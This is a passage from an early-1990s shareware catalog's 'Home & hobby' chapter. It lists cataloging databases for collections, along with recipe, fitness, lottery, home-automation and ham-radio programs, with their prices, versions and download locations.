number of + databases. Includes complete database management functions and + full featured report printing. Lists reports to screen, + printer or disk. A valuation report prints your inventory and a + summary of total items by category, location or owner. + Features: Pop-up pick lists; On-line help; warranty lists + showing warranty expiration dates, a sample database and much + more. + + Product: Music Manager for Windows + Needs: IBM AT (80286), Windows 3.0 or better. Standard or 386 + Enhanced mode. VGA recommended. + Author: Joe Herrera, 817-382-7585 + Registration: $25.00 + Registration benefits: 90 days phone support, one free upgrade. + Version: 1.10 (03-15-92) + User benefits: 90 days phone support, one free upgrade. + Look for: availability unknown on BBSs; MM110.ZIP in WINADV forum + LIB 1 on CompuServe. + Download size: 130k + Description: + A MUST for any serious music collector. Keep track of your + entire music collection, up to 1000 entries. Store information + on Artist, Title, Record Label, Format, Classification, and + Year. Select which fields to display while viewing the + database. Keep the database sorted by specifying up to 3 + unique fields. Search for text within the entire database. + Print the entire database or a range of records. + + Product: MuziTrak System + Compact Disc Cataloging Database. See full description on + page 376. + + Chapter 15, "Home & hobby" 353 + + + + Product: ORGANIZE! Jazz Collection + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + support, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: JAZZ527.ZIP on BBSs. + Download size: 300k + Description: + A database system designed specifically for cataloging jazz + collections. You can catalog your collection using up to 21 + criteria including the basics such as title, artist, composer, + and label. Plus you keep track of the individual performers on + each composition. All of the information you enter can be + found during a search, cross referenced, sorted and + alphabetized. Includes a repeat key and macros to make + entering information about your collection quick and easy. + + Product: ORGANIZE! Memorabilia + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + support, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: MEM527.ZIP on BBSs. + Download size: 300k + Description: + For collectors of memorabilia this is the software that can + help you organize your collection so you know what you have, + where it is stored and what it is worth. Plus you can also use + this software to keep wanted, available for trade, and for sale + lists. 3-D drop down menus and WYSIWYG screens make usiung + this software easy. You can catalog each piece in your + collection by up to 21 criteria, all of which can be searched, + cross referenced, sorted and alphabetized. + + Product: ORGANIZE! Professional Books + Cataloging system for professional books. See full description + on page 226. + + Chapter 15, "Home & hobby" 354 + + + + Product: ORGANIZE! Your Art + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + support, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: ART527.ZIP on BBSs. + Download size: 300k + Description: + A specialized cataloging system designed specifically for art + collections including - paintings, sculpture, prints, weavings, + castings, etc. Each piece can be cataloged by up to 21 + characteristics all of which can be searched, sorted, cross + referenced or alphabetized. Great for insurance purposes! A + single ATL-key combination displays both the total cost and + total current value. Published by HomeCraft, the leader in + software for cataloging collectibles. + + Product: ORGANIZE! Your Books/Magazines + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + master disks, newsletter support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: BOOKS527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database designed specifically for cataloging + books and magazines. Provides up to 21 fields, all of which + can be cross referenced, searched, alphabetized and sorted. + User definable reports all you to print anything from index + cards to full page reports. The 10,000,000 entry capacity + provides room for even the largest collection. + + "...a very complete program designed to meet the needs of the + most demanding book collector." - Journal of the National Book + Collector's Society. + + Chapter 15, "Home & hobby" 355 + + + + Product: ORGANIZE! Your CDs & Records + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + master disks, newsletter support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: POP527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database for cataloging CDs, LPs, cassettes, + tapes and music videos. It allows you to catalog your music + collection based on up to 21 criteria - all of which can be + searched, cross referenced and alpabetized. The 10,000,000 + entry capacity provides room for the largest collection. Rated + as the best available software for cataloging CD/LP collections + by both Goldmine and DISCoveries magazines. + + Product: ORGANIZE! Your Coin Collection + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + newsletter support, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, newsletter + support, updates, bonus utilities. + Look for: COINS527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database for cataloging coins from any country. + 3-D drop down menus and WYSIWYG screens make this software + straight forward and simple to use. Catalog each coin by up to + 21 criteria - all of which may be searched, alphabetized or + cross referenced. A 10,000,000 coin capacity allows this + software to handle any size collection. + + A repeat key and macros make entering information about your + collection quick and easy. User definable reports allow you to + print your reports the way you want. + + Chapter 15, "Home & hobby" 356 + + + + Product: ORGANIZE! Your Comic Books + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + updates, support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, updates, + support, bonus utilities. + Look for: COMIC527.ZIP on BBSs. + Download size: 300k + Description: + This software provides a fast and easy way to catalog a comic + book collection of any size. Repeat keys and macros make + entering information about your collection easy. You can use + up to 21 lines to catalog your collection - all of which can be + searched, cross referenced and alphabetized. 3-D drop down + menus provide quick access to all program features. User + definable reports let you print anything from index cards to + full page reports. + + Product: ORGANIZE! Your Fabrics + Specialized cataloging system for fabrics. See full + description on page 382. + + Product: ORGANIZE! Your Guns + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + support, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, support, + updates, bonus utilities. + Look for: GUNS527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database designed for both casual and licensed + gun collectors. Allows you to catalog up to 21 characteristics + for each gun. Great for insurance purposes! + + User definable reports allow you to have reports printed _your_ + way. 3-D drop down menus put all of the features at your + finger tips. Catalog, search and list your collection based on + gun type, caliper, year manufactured or any other way you wish. + This is the most flexible and complete software for cataloging + a gun collection. + + Chapter 15, "Home & hobby" 357 + + + + Product: ORGANIZE! Your Model Railroad + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + master disks, newsletter support, bonus utilities. + Version: 5.27 (03-31-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utilities. + Look for: RAIL527.ZIP on BBSs. + Download size: 300k + Description: + Designed for both the collector and modeler this software helps + the model railroad enthusiast get organized. You can use up to + 21 lines to catalog your collection/model railroad. All of the + lines can be searched, cross referenced, sorted or + alphabetized. A single ALT-key combination quickly gives you + the total cost and the total current value of your collection/ + model railroad. Great for insurance purposes! Published by + HomeCraft, the leader in cataloging software. + + Product: ORGANIZE! Your Plants/Garden + Specialized cataloging system for plants. See full description + on page 359. + + Product: ORGANIZE! Your Sports Cards + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, >1.5MB of Topps cards + data, updates, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, >1.5MB of Topps cards data, + updates, bonus utilities. + Look for: CARDS527.ZIP on BBSs. + Download size: 300k + Description: + Specialized database for cataloging baseball, football, hockey + and all other types of sports cards. Allows you to keep track + of what you have, what you want and what you have available for + trade or sale. Great for insurance purposes! + + Fast index based searches and sorting allows you to quickly + list your collection (or want list) or find the card you want. + Searches will list all cards over a set value or all rookie + cards. User definable reports let you get your printed reports + the way _you_ want. + + Chapter 15, "Home & hobby" 358 + + + + Product: ORGANIZE! Your Stamp Collection + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + updates, newsletter support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, updates, + newsletter support, bonus utilities. + Look for: STAMP527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database for cataloging stamps from any/all + countries. Repeat keys and macros make entering information + about similar stamps quick and easy. A 10,000,000 stamp + capacity provides room for the largest collection. Each stamp + can be cataloged using up to 21 criteria (16 of which are user + definable) - all of which can be searched, cross referenced, + alphabetized and sorted. User definable printed reports allow + you to print anything from index cards to full page reports. + + Product: SoundZ [***] + Needs: IBM PC, DOS 2.1 or better. Graphics or LaserJet printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $45.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support, lifetime free upgrades, bonus utilities. Product + discounts. Shareware disks of other programs. + Version: 2.21 (04-08-92) + User benefits: Printed manual, master disks, phone/BBS/mail + support, lifetime free upgrades, bonus utilities. Product + discounts. Shareware disks of other programs. + Look for: SNDZ221.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SOUNDZ.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 252k + Description: + This program was designed for audiophiles who have multiple + formats for their collections (Cassettes, CDs, 45s, 78s, LPs, + and Reel To Reels). It is more in depth than ANY of the other + audio program. So, if you need more than a basic catalog SoundZ + is the program for you! Standard entries for Title, Artist , + Reference Number, Category, Price/Value, Date of Purchase, Date + of Origin, UNLIMITED number of songs per side (with notes + entries for each!), and a text Liner NoteZ field of up to 5000 + lines. + + Product: VIDEO BUFF + Video Tape Organizer. See full description on page 362. + + Product: VIDEOCAT + Catalogs videocassette collections. See full description on + page 363. + + Chapter 15, "Home & hobby" 359 + + + + Product: VideoMaster + Helping You *Master Your Video Collection. See full + description on page 363. + + Product: VINO:FILE Cellar Master + Needs: IBM PC, DOS 2.1 or better. 256k RAM. Hard Disk + Recommended. + Author: Mark Christian, 011-61-3-882-3108 + Registration: $25.00 + Registration benefits: Printed manual, master disks, bonus + utilities. + Version: 2.15 (10-31-90) + User benefits: Printed manual, master disks, bonus utilities. + Look for: VINO215.ZIP on BBSs (call 617-354-8873 to download it + at no charge); VINOFL.ZIP in WINEFORUM forum LIB 6 on + CompuServe. + Download size: 240k + Description: + Organises your wine cellar! Keep an inventory, track purchases, + locate valuable bottles and enter tasting notes. An easy to use + interface and a neat geographic cross reference saves you from + entering repetitive data. Many searches and printed reports. + + Product: ZideCar [***] + Needs: IBM PC, DOS 2.0 or better. SoundZ data files. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $5.00 + Registration benefits: Printed manual, master disks, phone/BBS/ + mail support, lifetime free upgrades. Product discounts. + Shareware disks of other programs. + Version: 2.10 (03-09-92) + User benefits: Printed manual, master disks, phone/BBS/mail + support, lifetime free upgrades. Product discounts. Shareware + disks of other programs. + Look for: ZIDCAR21.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ZIDCAR.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 140k + Description: + An add-on program for SoundZ. Works with SoundZ' files to help + users find fillers for tapes & helps users total times on + tapes. BUT its biggest strength lies in allowing to the user + to pick & chose entries to construct new recordings from + existing SoundZ entries. Even tracks time left! Point & Shoot + menus for selection of tunes for filler or new tape. when + creating a new recording. Even creates a new entry for the + tape within SoundZ. + + Chapter 15, "Home & hobby" 360 + + + + 15.3 Gardening + + Product: ORGANIZE! Your Plants/Garden + Needs: IBM PC, DOS 3.1 or better. Hard disk recommended. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + master disks, newsletter support, bonus utiliites. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, master + disks, newsletter support, bonus utiliites. + Look for: PLANT527.ZIP on BBSs. + Download size: 300k + Description: + If you'd like to keep track of the plants you have in your + house, yard or garden then this is the software for you! Not + only can you catalog the plants you have, but for each one you + can record its characteristics such as color, when it blooms, + its growth, etc. Plus you can have any care instructions + immediately available at your finger tips. 3-D drop down menus + and WYSIWYG screens make this software easy to use. Published + by HomeCraft, the leader in cataloging software. + + + 15.4 Household automation + + Product: Smart10 + Needs: IBM PC, DOS 3.3 or better. X10 PowerHouse CP290. + Author: Sympathetic Software + Registration: $20.00 + Registration benefits: Free upgrading. + Version: 1.2 (10-06-91) + User benefits: Free upgrading. + Look for: SMRTEN11.ZIP on BBSs (call 714-730-6743 to download it + at no charge); SMRTEN.EXE in ZNT:UTILFORUM forum LIB 14 on + CompuServe. + Download size: 97k + Description: + Devised to overcome limitations of the CP290 and its software. + It maintains a year's calendar of events. Use Sunrise and + Sunset as times. Events can beconditioned to occur (or not) if + it is Dark (or Light), between dates you have specified, or on + command line parameters. + + Issue direct or delayed commands and cancel pending events. + Automate AUTOEXEC.BAT with CHKTIME (compares the computer's + date- time with target date-times) and DSTIME (adjusts clock + for daylight savings time). + + Chapter 15, "Home & hobby" 361 + + + + 15.5 Movies & video tapes + + Product: Collect! (VGA version) + Intelligent Collection Management Tool. See full description + on page 351. + + Product: DiscTrak System + Needs: IBM PC, DOS 2.1 or better. Hard disk, 512k RAM. + Author: Blam Entertainment Group, 613-831-4064 + Registration: $25.00 + Registration benefits: Serial Number, New Version Verification, + Free Upgrades. + Version: 1.62 (10-08-91) + User benefits: Serial Number, New Version Verification, Free + Upgrades. + Look for: DT-162.ZIP on BBSs. + Download size: 185k + Description: + Home entertainment database capable of tracking LaserDiscs, + Compact Discs, Video Tapes, Cassette Tapes and Record Albums. + Limited only by the size of your disk drive space. This + program will track anything you could possibly imagine and + more. Easy to use, menu driven. Fully configurable printer + support. Search for a specific song, star, director, or title. + Compact discs can include up to 99 songs per disc. Includes + interface for archive support. + + Product: Movie Guide + Needs: IBM PC, DOS 2.1 or better. 384k RAM, hard disk. + Author: SANDD Software, 703-444-8655 + Registration: $30.00 + Registration benefits: Phone and mail support. Notification of + enhancements and other products. + Version: 3.0 (07-15-91) + User benefits: Phone and mail support. Notification of + enhancements and other products. + Look for: availability unknown on BBSs; MOVIEA.ZIP in IBMAPP + forum LIB 7 (multiple files) on CompuServe. + Download size: 500k + Description: + I now have a camcorder, recorded movies, TV shows and training + films, how can I keep track of all this information? Remember, + it must be FUN and POWERFUL. Movie Guide can help. It will + catalog your movies, show pictures, and play music. + Automatically tracks film history of the stars and directors, + and of course show any pictures or songs associated with them. + If you just want to track multimedia files, then select + 'Multimedia Search' and you're done. + + Chapter 15, "Home & hobby" 362 + + + + Product: ORGANIZE! Your Video Tapes + Needs: IBM PC, DOS 3.1 or better. + Author: HomeCraft Software, 503-692-3732 + Registration: $59.95 + Registration benefits: Printed manual, quick reference card, + upgrades, newsletter support, bonus utilities. + Version: 5.27 (03-23-92) + User benefits: Printed manual, quick reference card, upgrades, + newsletter support, bonus utilities. + Look for: VIDEO527.ZIP on BBSs. + Download size: 300k + Description: + A specialized database designed specifically for cataloging + video tapes (movies, TV shows & personal videos). Each + selection on a tape can be cataloged using up to 21 criteria - + all of which can be searched, cross referenced, sorted and + alphabetized. 3-D drop down menus and WYSIWYG screens make + this software straight forward and simple. + + User definable reports let you print anything from index cards + to full page reports. Published by HomeCraft, the leader is + software for cataloging collections. + + Product: Peronal Record Keeper + Storage of personal and family information. See full + description on page 383. + + Product: VIDEO BUFF + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Hard Disk + recommended. + Author: CACHE MICROSYSTEMS, 805-549-0532 + Registration: $17.00 + Registration benefits: 1 yr. Tech Support. + Version: 1.33 (01-01-92) + User benefits: 1 yr. Tech Support. + Look for: VDBUF133.ZIP on BBSs (call 414-789-4210 to download it + at no charge). + Download size: 198k + Special instructions: Product distribution restricted to the + United States. + Description: + Easy to use menu driven video tape organizer. Keep track of + your entire video collection. Unique features all the user to + find subjects, stars, costars quickly. Multiple recordings per + tape with tape position and recording. Several printer outputs + allows the user to print complete list of all video tapes, + individual video tapes. Print labels for tapes. Database Backup + is featured. 10 user defined fields. + + Chapter 15, "Home & hobby" 363 + + + + Product: Video Librarian + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Author: TurboSystemsCo, 404-516-8575 + Registration: $34.95 + Registration benefits: Printed Manual, Latest Version, Technical + Support, Product Discounts. + Version: 3.5s (02-10-92) + User benefits: Printed Manual, Latest Version, Technical Support, + Product Discounts. + Look for: VLB.ZIP on BBSs; VLB.EXE in IBMAPP forum LIB 7 on + CompuServe; VLB35.ZIP in IBMPC RTC LIB 15 on GEnie. + Download size: 159k + Description: + Full featured menu-driven database manager that catalogs video + libraries like no other. 14 database management functions + available from data entry screen. Holds 18 fields of + information about each title. Has very fast search and find + routines. Prints reports to the screen, printer or disk. Prints + labels on regular or custom labels for cassettes. Mouse + support, context sensitive help, moveable, re-sizeable browse/ + find screens. Memo field for movie synopsis. Can hold 2 billion + titles. + + Product: VIDEOCAT + Needs: IBM PC, DOS 2.1 or better. Includes programs for Windows + & OS/2 as well. + Author: William A. Jackson + Registration: $20.00 + Registration benefits: Next update is free. C source code + available on request. + Version: 7.2 (07-28-91) + User benefits: Next update is free. C source code available on + request. + Look for: VCAT72.ZIP on BBSs (call 714-856-7996 to download it at + no charge); VCAT72.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 140k + Description: + Fully featured text-based program for cataloging videocassette + collections; designed for serious collectors and large + collections. Add, change, delete records, print labels and + listings, statistical reports. Classification categories can + be custom configured by user; record includes free-form text + comment field. Family API runs under DOS or OS/2. A Windows + compatible program is also included. May conflict with some + shells, popups and other TSRs. + + Chapter 15, "Home & hobby" 364 + + + + Product: VideoMaster + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 7.50 (07-04-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: VIDM750.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM75.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 129k + Description: + To help User catalog their video tapes and assist User in + printing catalogs, standard and User customized listings and + labels for the spine and front of the tape. There are entries + for Tape Number, Title, Rating, Start Point, Star, Co Star, + three User defined entries and a seven line Synopsis as well as + Category. User can find any tape by any field or combination. + The program can handle up to multiple titles on a single tape, + file only being limited by disk space. Great for the home + video buff! + + + 15.6 Personalities + + Product: By the Numbers + Personality analysis with Numerology. See full description on + page 378. + + Product: Play For Mate [***] + Game for Women Only : Discreet Event Simulati. See full + description on page 422. + + Product: WordZ + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/mail support. + Shareware disks of other programs. + Version: 2.00 (07-31-91) + User benefits: Master disks, phone/mail support. Shareware disks + of other programs. + Look for: WORDZ200.ZIP on BBSs (call 317-784-2147 to download it + at no charge); WORDZ.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 150k + Description: + Ever wanted to keep track of jokes, stories, family history or + whatever and wanted an easy way to do it? WordZ to the rescue. + You can build up to 10 different chapters a page ata time. Even + has KeyWordZ to quick reference each page! All chapters have + seperate defaults for colour, drive, file name, and title. Each + chapter is also capable of having its own PassCode and + + Chapter 15, "Home & hobby" 365 + + + + encryption! All profits from this program are being donated to + the American Cancer Society. + + + 15.7 Health + + Product: LEANER + Weight Control Charting & Motivation Program. See full + description on page 224. + + 15.7.1 Food/dietary/kitchen + + Product: The Better Diet Analyzer + Needs: IBM PC, DOS 2.0 or better. 384k RAM. + Author: Syntonic Software, 704-542-0473 + Registration: $29.95 + Registration benefits: Printed manual, master disks, one year + phone/CIS/mail support, upgrade discounts. + Version: 3.1 (01-11-92) + User benefits: Printed manual, master disks, one year phone/CIS/ + mail support, upgrade discounts. + Look for: BDA*.ZIP (multiple files) on BBSs (call 212-431-1194 to + download it at no charge); BDA*.ZIP in IBMAPP forum LIB 7 + (multiple files) on CompuServe; BDA*.ZIP in IBMPC RTC LIB 3 + (multiple files) on GEnie. + Download size: 308k + Description: + Over 1,400 food records, including brand names and fast food + restaurants. Features a Database Editor plus a Recipe Builder + to add foods and recipes to the database. Tracks calories, + cholesterol, protein, carbohydrates, fat, sodium, alcohol and + your weight. Gives an instant report on percent of calories + from protein, carbohydrates and fat. Excellent for lowering + your cholesterol or "carbo loading" for sports events. Manual + includes diet, cholesterol and carbo loading guidelines. + + Product: Master Meal Manager + Needs: IBM PC, DOS 2.0 or better. 640k RAM. + Author: Thomas C. Johnson, 513-878-9174 + Registration: $25.00 + Registration benefits: Printed manual, master disks, six months + support. + Version: 1.51 (01-09-92) + User benefits: Printed manual, master disks, six months support. + Look for: availability unknown on BBSs. + Download size: 160k + Description: + A masterful combination of user friendliness and common sense + functions making the common kitchen management chores (recipes, + meal planning, and shopping) a breeze. All three are integrated + so that your recipes are used to generate a meal schedule for + up to 14 days worth of meals. The meal schedule and recipes are + then used to generate your shopping list. Easy to learn. Easy + to use. + + Chapter 15, "Home & hobby" 366 + + + + Product: OMNIMeal + Needs: IBM PC, DOS 2.1 or better. IBM Graphics printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Registration benefits: Master disks, phone/BBS/mail support. + Shareware disks of other programs. + Version: 3.03 (09-01-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: OMEAL303.ZIP on BBSs (call 317-784-2147 to download it + at no charge); OMEAL.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 150k + Description: + All the standard features of Recipe programs PLUS: MulipleXer: + Allows User to increase/decrease the number of people served by + a particular recipe, and changes all of the required + ingredients automatically; OMNIFind!: Allows User to do + extensive searches of the data file; The choice of printing + lists, catalogs, two 1-sided, or one 2-sided 3X5 card for each + recipe. OMNIShop: Shopping list for the recipes chosen that + lists not only the ingredients but combines like ingredients + for ease of use. + + Product: Smart Home Shopper + Needs: IBM PC, DOS 3.0 or better. Hard disk recommended. + Author: Torbert Data Systems, INC., 804-488-5506 + Registration: $20.00 + Registration benefits: Receive latest version and copy of another + program- Support BBS. + Version: 1.2 (06-07-91) + User benefits: Receive latest version and copy of another + program- Support BBS. + Look for: TDS BBS on BBSs (call 804-488-5506 to download it at no + charge); SHS12.ZIP in IBMAPP forum LIB 7 on CompuServe; + SHS12.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 300k + Special instructions: Product distribution restricted to the + United States. + Description: + Quickly and conveniently prepare a grocery shopping list in + store aisle order. Once a product is entered, it only needs to + be tagged to appear on future lists. Use at several levels of + sophistication. You can actually store price information from + several different stores and let the program do comparison + shopping and prepare multiple shopping lists. Much more. Well + supported by the author. + + Product: VINO:FILE Cellar Master + Wine cellar management system. See full description on + page 359. + + Chapter 15, "Home & hobby" 367 + + + + 15.7.2 Exercise/fitness + + Product: Aerosoft Fitness Log + Needs: IBM PC, DOS 2.0 or better. + Author: Aerosoft, 317-849-7659 + Registration: $49.00 + Registration benefits: 40 pg user manual. Presidential Sports + Award poster and brochure. Mailing labels and Exercise Test + utilities. + Version: 2.3 (10-15-91) + User benefits: 40 pg user manual. Presidential Sports Award + poster and brochure. Mailing labels and Exercise Test + utilities. + Look for: availability unknown on BBSs. + Download size: 250k + Description: + * Records all 49 exercises featured in the Presidential + Sports Award program and directs you in mailing for your + Award. + * Calculates aerobic points and calories burned. + * Compares on a monthly basis current year aerobic point + totals and cardiovascular fitness levels with the previous + year. + * Tracks 999 users per log. Optionally requires passwords. + * Prints: Detail and Summary Exercise History; Presidential + Sports Awards; User IDs. + + + 15.8 Lottery + + Product: Lotto Challenger + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Data Solutions, 800-783-8934 + Registration: $29.50 + Registration benefits: Most recent version, voice/CIS/newsletter + support, free lottery data file, discount on other lottery + products. + Version: 3.6 (01-01-91) + User benefits: Most recent version, voice/CIS/newsletter support, + free lottery data file, discount on other lottery products. + Look for: LC36.ZIP on BBSs (call 414-789-4210 to download it at + no charge); LC36.ZIP in IBMNEW forum LIB 9 on CompuServe. + Download size: 135k + Description: + Uses a statistical analysis of previous drawings to pick lotto + numbers to play. The program includes 20 number systems that + generate tickets from the numbers picked. The program compares + the tickets to the numbers drawn, and determines winning + tickets. A history option allows testing of playing strategies + on previous drawings. Lotto Challenger is completely menu + driven and very user friendly. Supports keyboard or mouse + input. Compatible with all Pick 5 or Pick 6 lotteries. + + Chapter 15, "Home & hobby" 368 + + + + Product: LOTTO PROPHET + Needs: IBM PC, DOS 2.1 or better. Hard disk recommended. + Author: DataMicro, Inc, 813-629-7720 + Registration: $15.00 + Registration benefits: Latest version, Upgrade opportunities, + Tech support, Reg.# replaces the 'Unregistered' Comments. + Version: 3.01 (06-01-91) + User benefits: Latest version, Upgrade opportunities, Tech + support, Reg.# replaces the 'Unregistered' Comments. + Look for: PROPHET3.ZIP on BBSs (call 813-624-6129 to download it + at no charge); PROP30.EXE in IBMNEW forum LIB 9 on CompuServe; + PROPHET3.ZIP in IBM RTC LIB 7 on GEnie. + Download size: 180k + Description: + A lottery science statistical compiler - evaluator - the most + complete lottery software on the the market today. Can hold 60 + lotteries. Update & Edit. Statistical reports:Frequently drawn + numbers, HOT numbers, Numbers appearing with other numbers, + numbers appearing in a certain month, Power/Due rating, Numbers + likely to follow the last draw. Doubles & Triples Reports. + Prints reports, graphs, charts, prophet cards. Stores player's + numbers and checks for winners. + + Product: The LOTTO SIMULATOR + Needs: IBM PC, DOS 2.1 or better. + Author: Brentson Worrell, 813-886-2282 + Registration: $20.00 + Registration benefits: Latest version disk, extra lotto + statistic, bypass Shareware screen, tech support by phone or + mail, future upgrades for low price. + Version: 1.0 (08-20-91) + User benefits: Latest version disk, extra lotto statistic, bypass + Shareware screen, tech support by phone or mail, future + upgrades for low price. + Look for: LOTSIM10.ZIP on BBSs; LOTSIM.ZIP in IBMAPP forum LIB 7 + on CompuServe; LOTSIM10.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 36k + Description: + Uses a different approach to winning the lottery. It's not a + wheeling or database style program. Instead it takes your picks + and compares them to thousands of random lottery drawings, + similar to actual lotto games. Almost instantly you can see + how your picks stand up against the odds. Various statistics + are recorded, and displayed or printed. Whether you use your + own numbers or let the computer choose them for you, Lotto + Simulator is fast, informative, and FUN! + + Chapter 15, "Home & hobby" 369 + + + + Product: Lotto Thunder + Needs: IBM PC, DOS 3.0 or better. 640k RAM, hard disk. + Author: Charles P.Staats + Registration: $20.00 + Registration benefits: Printed Manual with disk, Newletter + support, New versions before offical release. + Version: 1.00 (10-21-91) + User benefits: Printed Manual with disk, Newletter support, New + versions before offical release. + Look for: LOTTOT.ZIP on BBSs; LOTTOT.ZIP in IBMNEW forum LIB 9 on + CompuServe. + Download size: 413k + Description: + Would you like to play all the numbers in your PICK-6 lotto? + Try this complete Lotto Prediction and Number systems program. + It has three completely different methods of predicting lotto + numbers. Wheel systems up to 54 numbers, Multiple Level + Predictions, Save Predictions, Scan for Winners, Scan for Past + Performance, Auto and Manual execution of prediction methods, + No Game limit. + + Product: LottoMATIC [***] + Needs: IBM PC, DOS 3.0 or better. + Author: Custom Technologies, 904-871-5479 + Registration: $25.00 + Registration benefits: Printed Manual, phone/fax/CompuServe + support, product discounts. Shareware disks of other programs. + Version: 1.01B (03-22-92) + User benefits: Printed Manual, phone/fax/CompuServe support, + product discounts. Shareware disks of other programs. + Look for: availability unknown on BBSs; LOTTO.ZIP in IBMNEW forum + LIB 9 on CompuServe. + Download size: 120k + Description: + LottoMATIC is a general purpose lottery gaming and tracking + program. Features include: Configurable for virtually any + state or national lottery, stores up to 30,000 plays, tracks + wins and prizes, generates numerous reports, three separate + guessing algorithms, data import, pull-down menus, online help, + pop-up calculator, colors, sound effects, much, much more! + Includes history files for Florida lottery (you can add your + own) and a complete manual. + + Chapter 15, "Home & hobby" 370 + + + + 15.9 Ham radio + + Product: LAN-LINK + Needs: IBM PC, DOS 2.0 or better. Radio transceiver and TNC. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $35.00 + Registration benefits: Electronic, telephone and mail support. + Free upgrades. + Version: 1.59 (04-01-91) + User benefits: Electronic, telephone and mail support. Free + upgrades. + Look for: LL159EXE.ZIP on BBSs (call 301-593 9067 to download it + at no charge). + Download size: 320k + Description: + A Personal Packet Terminal Program for the TNC1, TNC2, KPC-2 + and most of all a smart multimode digital communications + controller for the KAM, MFJ1278 and the PK-232. Menu driven, + optimizes the configuration of the TNC in each communications + mode and provides smart terminal features. If you are not using + LAN-LINK, you are not making the most use of the LAN. + + Product: PC-ECAP + AC Circuit Analysis program with graphics. See full + description on page 276. + + Product: PC-HAM + Needs: IBM PC, DOS 2.0 or better. + Author: Software for Amateur Radio, 301-593 6136 + Registration: $36.50 + Registration benefits: update, dBASE source code to logging + package, and support. + Version: 5.52 (03-20-91) + User benefits: update, dBASE source code to logging package, and + support. + Look for: LOG3_52.EXE on BBSs (call 301-593 9067 to download it + at no charge). + Download size: 150k + Description: + More than a simple menu driven computerized logbook, it allows + you to access the data in the logbook in ways that have not + been previously possible. For example:- Generate your DXCC + status automatically. + + A contest logging package, sweepstakes simulation game and + propagation prediction programs are also included in the + package. + + Product: PC-TRACK + Satellite Tracking Package. See full description on page 348. + 